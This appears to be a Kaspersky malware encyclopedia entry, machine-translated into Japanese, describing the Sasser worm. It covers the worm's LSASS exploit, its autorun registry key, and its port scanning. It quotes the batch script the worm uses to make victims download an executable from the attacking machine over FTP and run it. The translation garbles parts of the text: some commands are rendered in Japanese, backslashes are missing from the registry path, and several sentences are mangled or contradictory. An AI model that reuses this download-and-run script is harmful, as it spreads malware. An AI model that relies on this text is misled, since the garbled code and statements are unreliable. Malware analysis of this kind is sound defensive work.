本サービスには一部、Googleの支援により翻訳されたコンテンツが含まれます。Googleは、明示または黙示を問わず、市場性、特定目的への適合性、ならびに非侵害の黙示的保証を含む、翻訳の精度、信頼性、正確性に関連するあらゆる点において保証しません。

Kaspersky Labの本Webサイトは、便宜上、Google Translateを搭載した翻訳ソフトウェアを利用して翻訳されています。正確な翻訳となるよう合理的な努力を払ってはおりますが、自動翻訳の正確性は完全ではなく、翻訳者(人間)による翻訳に代わるものとして意図されているものでもありません。翻訳はKaspersky Labの本Webサイトをご利用の皆様の利便性を図るためのものであり、「翻訳結果をそのまま」ご提供するものです。英語からその他言語への翻訳における精度、信頼性、正確性に関しては、明示または黙示を問わず、いかなる保証もなされません。翻訳ソフトウェアのため、コンテンツの一部(画像、動画、フラッシュ等)は正しく翻訳されない場合があります。

Net-Worm.Win32.Sasser

検出日 05/13/2004
クラス Net-Worm
プラットフォーム Win32
説明

Sasserは、 Microsoft Security Bulletin MS04-011に記載されているMS Windows LSASSの脆弱性を悪用するインターネットワームです。

マイクロソフトは2004年4月13日にこの脆弱性に対するパッチをリリースしました.Sasser.aは2004年4月30日に最初に検出されました。

サッサーは除くこと、Lovesanのに非常によく似た方法で動作Lovesanのは、 PRC DCOMサービスではなく、LSASSサービスの脆弱性を悪用しました。

Sasserは、Windows 2000、Windows XP、Windows Server 2003を実行しているコンピュータに影響します。Sasserは他のすべてのバージョンのWindowsでは機能しますが、この脆弱性による攻撃では感染できません。

SasserはVisual Cコンパイラを使用してC / C ++で書かれています。このワームは約15KLで、PECompact2で圧縮されています。

感染の徴候

  • Windowsディレクトリ内のファイル 'avserve.exe'。
  • LSASSサービスに関するエラーメッセージが表示されず、通常はシステムが再起動します。

伝搬

起動後、Sasserはavserve.exeという名前でWindowsのルートディレクトリに自身をコピーし、このファイルをシステムレジストリの自動実行キーに登録します。

 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]



 "avserve.exe" = "%WINDIR%avserve.exe" 

Sasserは、感染の将来の試みの場合に、自身のコピーを見つけるためにRAMに一意の識別子 'Jobaka31'を作成します。

SasserはTCPポート5554でFTPサーバーを起動し、次に128の伝播ルーチンを起動します。このプロセス中、ワームはシステムの再起動を禁止するためにAbortSystemShutdownプロセスを開始しようとします。

Sasserは犠牲者アドレスを特定するためにIPアドレススキャンを開始し、TCPポート445に要求を送信します。マシンが応答すると、SasserはLSASSの脆弱性を悪用してTCPポート9996で 'cmd.exe'コマンドシェルを起動します。感染したマシンに「N_up.exe」という名前でメインワームコンポーネントをダウンロードして起動するように指示します。「N」は乱数です。

 エコーオフ



エコーオープン [攻撃マシンアドレス] 5554 >> cmd.ftp



echo anonymous >> cmd.ftp



ユーザーをエコーする



echo bin >> cmd.ftp



echo get [乱数] _up.exe >> cmd.ftp



echo bye >> cmd.ftp



エコーオン



ftp -s:cmd.ftp



[乱数] _up.exe



エコーオフ



del cmd.ftp



エコーオン 

その結果、1台のマシンが2回以上攻撃され、以下のようなサンプル名のワームの複数のコピーが含まれている可能性があります。

 23101_up.exe



5409_up.exe 

等々。

その他

感染後、犠牲PCはLSASSサービスが失敗したことに関するエラーメッセージを生成し、そこでリブートを試みる可能性があります。

Sasserは、Cドライブのルートディレクトリに「win.log」ファイルを作成します。このディレクトリでは、攻撃されたすべてのマシンのIPアドレスが記録されます。


オリジナルへのリンク